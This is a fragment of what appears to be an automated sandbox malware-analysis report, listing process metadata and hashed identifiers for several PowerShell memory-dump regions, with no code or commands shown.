                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Reset < >
                            Memory Dump Source
                            • Source File: 00000000.00000002.2962019111.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5c1863a8d0c439f0a2be99eb0ee668470c20fb6b659ea9b1edc5c01fbfb2bdd6
                            • Instruction ID: 8a1d6163d6236998bd762296e6eaccbc25e66cff1e8325a223d5fd69aa0bebb8
                            • Opcode Fuzzy Hash: 5c1863a8d0c439f0a2be99eb0ee668470c20fb6b659ea9b1edc5c01fbfb2bdd6
                            • Instruction Fuzzy Hash: 9A111F7290E3D25FE317976868665A07FB0DF1327471901EBC0D58B0E3D51E588AC766
                            Memory Dump Source
                            • Source File: 00000000.00000002.2962455544.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a86f8c834d40908daddee4cebf23a2b1743e8a6f2457feacb1518840964df5d
                            • Instruction ID: 40ca17978c73af55312c72343e50d65c21a09661af72b965c2a86dcee3f6be9e
                            • Opcode Fuzzy Hash: 0a86f8c834d40908daddee4cebf23a2b1743e8a6f2457feacb1518840964df5d
                            • Instruction Fuzzy Hash: B0012D31E0EAC59FEF95EF6CA4415B4B7E1FF59360B0800BAC04CD7143E919D8054311
                            Memory Dump Source
                            • Source File: 00000000.00000002.2962019111.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                            • Instruction ID: 63d261e5030bf50a0263ba23c0598a5978839cbcf63e0de1cd532dacb3c0aa9b
                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                            • Instruction Fuzzy Hash: 8C01677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                            Memory Dump Source
                            • Source File: 00000000.00000002.2962455544.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 63d67d8022cead3879fb628ab0ff56851b7f43dab727cca654f8c5c8d8990200
                            • Instruction ID: 3b3f88846c474ae8367af51b902462029c0f98e152cd696d739afcc4b034d3f9
                            • Opcode Fuzzy Hash: 63d67d8022cead3879fb628ab0ff56851b7f43dab727cca654f8c5c8d8990200
                            • Instruction Fuzzy Hash: DAF0BB31E0E6854FEB95EB6C64455E8B7E0EB59261B0800BBD04CD3153F91958454311